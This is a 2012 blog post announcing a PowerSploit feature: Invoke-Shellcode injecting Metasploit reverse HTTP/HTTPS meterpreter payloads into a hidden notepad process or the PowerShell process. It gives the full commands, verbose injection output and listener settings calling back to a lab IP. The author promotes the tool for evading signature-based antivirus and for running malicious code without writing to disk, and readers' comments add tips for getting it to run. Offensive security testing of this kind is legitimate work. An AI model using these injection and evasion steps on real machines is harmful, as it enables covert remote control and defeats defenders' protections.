Thursday, June 7, 2012

PowerSploit - New Feature: Invoke-Shellcode now supports Metasploit HTTP[S] payloads

PowerSploit Repo

The Invoke-Shellcode script, which is part of the PowerSploit project now supports windows/meterpreter/reverse_http and windows/meterpreter/reverse_https payloads. Now, you don't have to pre-generate your shellcode ahead of time if you don't want to. The new syntax for this feature can be seen in the following examples:

Example #1
Establishes a reverse https meterpreter payload from within the hidden notepad process.

PS> Start-Process C:\Windows\SysWOW64\notepad.exe -WindowStyle Hidden
PS> $Proc = Get-Process notepad
PS> Invoke-Shellcode -Remote -ProcessId $Proc.Id -Meterpreter_Reverse_Https -Lhost 192.168.30.129 -Lport 443 -Verbose
VERBOSE: Requesting meterpreter payload from https://192.168.30.129:443/INITM
VERBOSE: Injecting shellcode into PID: 4004
VERBOSE: Injecting into a Wow64 process.
VERBOSE: Using 32-bit shellcode.
VERBOSE: Shellcode memory reserved at 0x03BE0000
VERBOSE: Emitting 32-bit assembly call stub.
VERBOSE: Thread call stub memory reserved at 0x001B0000
VERBOSE: Shellcode injection complete!

A multi-handler was set up with the following options:

Payload options (windows/meterpreter/reverse_https):

  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  EXITFUNC  thread           yes       Exit technique: seh, thread, process, none
  LHOST     192.168.30.129   yes       The local listener hostname
  LPORT     443              yes       The local listener port




Example #2
Establishes a reverse http meterpreter payload from within the running PowerShell process.

PS> Invoke-Shellcode -Local -Meterpreter_Reverse_Http -Lhost 192.168.30.129 -Lport 80

A multi-handler was set up with the following options:

Payload options (windows/meterpreter/reverse_http):

  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  EXITFUNC  thread           yes       Exit technique: seh, thread, process, none
  LHOST     192.168.30.129   yes       The local listener hostname
  LPORT     80               yes       The local listener port

It's worth noting that because the reverse http[s] payloads are only supported in 32-bit, you must run these commands from 32-bit PowerShell. I plan on adding additional 32 and 64-bit payloads in the future.

As usual, let me know if you run into any bugs or have any feature requests.

Lastly, I really want to drive the point home that by using Invoke-Shellcode, you are practically assured that you will not be flagged by signature-based antivirus. So if you're on a machine with PowerShell, which is increasingly likely these days, no more are the days where you'd have to generate thousands of encoded Meterpreter executables in the hopes that one of them might not get flagged by AV. Also, using this script, you are not dropping an executable onto the disk. Essentially, Invoke-Shellcode should alleviate many if not all the headaches associated with running malicious code on a machine running AV or HIPS products.

Please enjoy responsibly. :D

3 comments:

  1. Nice, keep up the good work. +1 exploit-monday

    ReplyDelete
  2. Being a newb to powershell, I had loads of trouble getting the Inject-Shellcode to execute.

    Following your examples in the file: 'Inject-Shellcode -Local' (in the same folder as Inject-Shellcode.ps1) tells me the term 'Inject-Shellcode' is not recognized as the name of a cmdlet.

    Suggestion: The command does exist in the current location use '.\Inject-Shellcode'. However nothing executes when run as '.\Inject-Shellcode'.

    Instead I used '. .\Inject-Shellcode.ps1' which appears to import the function and then 'Inject-Shellcode' works fine (and boots up calc.exe).

    Hopefully this might save someone else some time :)

    ReplyDelete